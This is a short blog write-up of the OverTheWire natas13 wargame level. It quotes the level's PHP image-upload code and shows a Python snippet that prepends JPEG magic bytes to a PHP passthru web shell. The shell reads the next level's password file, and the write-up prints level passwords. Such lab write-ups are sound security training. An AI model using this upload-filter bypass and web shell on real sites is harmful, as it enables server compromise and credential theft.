Open in app

Sign in

Write

Sign in

OverTheWire’s natas13

Enes Aladağ
2 min readNov 13, 2023

--

username: natas13
password: lW3jYRI02ZKDBb8VtQBU1f6eDRo6WEj9

In this level just like natas12 some kind of image upload page welcoming us. As always we want to get strings for something (password :D). When i check source code i see:

<?php

function genRandomString() {
    $length = 10;
    $characters = "0123456789abcdefghijklmnopqrstuvwxyz";
    $string = "";

    for ($p = 0; $p < $length; $p++) {
        $string .= $characters[mt_rand(0, strlen($characters)-1)];
    }

    return $string;
}

function makeRandomPath($dir, $ext) {
    do {
    $path = $dir."/".genRandomString().".".$ext;
    } while(file_exists($path));
    return $path;
}

function makeRandomPathFromFilename($dir, $fn) {
    $ext = pathinfo($fn, PATHINFO_EXTENSION);
    return makeRandomPath($dir, $ext);
}

if(array_key_exists("filename", $_POST)) {
    $target_path = makeRandomPathFromFilename("upload", $_POST["filename"]);

    $err=$_FILES['uploadedfile']['error'];
    if($err){
        if($err === 2){
            echo "The uploaded file exceeds MAX_FILE_SIZE";
        } else{
            echo "Something went wrong :/";
        }
    } else if(filesize($_FILES['uploadedfile']['tmp_name']) > 1000) {
        echo "File is too big";
    } else if (! exif_imagetype($_FILES['uploadedfile']['tmp_name'])) {
        echo "File is not an image";
    } else {
        if(move_uploaded_file($_FILES['uploadedfile']['tmp_name'], $target_path)) {
            echo "The file <a href=\"$target_path\">$target_path</a> has been uploaded";
        } else{
            echo "There was an error uploading the file, please try again!";
        }
    }
} else {
?>

this just looks like natas12 but some more. This time checks file is image or not with exif_imagetype() function. After doing some quick researching i just found out this function is file starts with ‘\xFF\xD8\xFF\xE0’ or not.
So this might help:

shell=open('natas13.jpeg','wb')
shell.write(b'\xFF\xD8\xFF\xE0')

Yes, exif_imagetype() function bypassed.

So lets add some more then turn it into to ‘something.php’ just like we did for natas12

shell=open('natas13.jpeg','wb')
shell.write(b'\xFF\xD8\xFF\xE0'+b"<?php passthru('cat /etc/natas_webpass/natas14');")
shell.close()

Uploaded and worked just like new one.

pass for natas14: qPazSJBmrmU7UQJv17MHk1PGC4DxZMEP

Overthewire
Ctf
Infosec
Web Security

--

--

Enes Aladağ

Written by Enes Aladağ

2 Followers

Jr. Pentester

Help

Status

About

Careers

Press

Blog

Privacy

Terms

Text to speech

Teams